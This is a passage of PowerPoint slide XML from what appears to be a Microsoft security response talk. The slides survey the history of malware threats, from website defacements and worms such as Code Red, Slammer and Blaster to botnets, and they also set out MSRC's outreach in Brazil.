            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ekoPartye</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35850" name="Rectangle 498"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3360738" y="5507038"/>
            <a:ext cx="865187" cy="131762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="2" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35851" name="Rectangle 502"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3571875" y="5530850"/>
            <a:ext cx="231775" cy="107950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YSTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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2900" y="2249488"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Threat Evolution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Payload Evolution </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8382000" cy="5022850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>The Vandals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>1998 – 2001 – Web Site Defacements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Era of Big Worms </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 2001 – 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Rise of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Botnets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>2004 – present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Era of Purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>2006 - present</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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8"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Web Site Defacements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="327025" y="1644650"/>
            <a:ext cx="5503863" cy="4441825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1998 – 1999 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> Several countries are reported involved in patriotic hacking: United States, Pakistan, China, Brazil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>December 28, 1999 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>– a hacking group declares cyberwar against Iraq and China</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>January 7, 1999 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>– Several other hacking groups make successful plea for restraint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="Picture 12" descr="Picture1 for cncert preso.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5730875" y="830263"/>
            <a:ext cx="3217863" cy="5864225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Payload Evolution </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8382000" cy="5022850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Vandals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1998 – 2001 – Web Site Defacements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>The Era of Big Worms </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> 2001 – 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Rise of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Botnets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>2004 – present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Era of Purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>2006 - present</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Intro – Why Am I Here? 	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8540750" cy="4406900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Brasil is Special &amp; Unique </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Microsoft is committed to Brasil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MSRC Mission: Protect Customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unique challenges in Brasil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Partner w/ Organizations &amp; Companies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Software Engineering and Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Consumer &amp; Enterprise Education</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Update on Microsoft Progress to help make a secure computing environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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45105" y="335119"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>"Playful Payloads"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1433513"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="396875" indent="-396875" defTabSz="914363" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Code Red &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Nimda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="854075" lvl="1" indent="-396875" defTabSz="914363" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Defacements </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="854075" lvl="1" indent="-396875" defTabSz="914363" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Multi Vector Infection Payload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="396875" indent="-396875" defTabSz="914363" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Slammer – SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="854075" lvl="1" indent="-396875" defTabSz="914363" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Replication to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Random IP Addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="396875" indent="-396875" defTabSz="914363" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Blaster – RPC / DCOM buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="854075" lvl="1" indent="-396875" defTabSz="914363" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYN flood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WindowsUpdate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Payload Evolution </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8382000" cy="5022850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Vandals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1998 – 2001 – Web Site Defacements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Era of Big Worms </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 2001 – 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>The Rise of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Botnets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>2004 – present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The Era of Purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
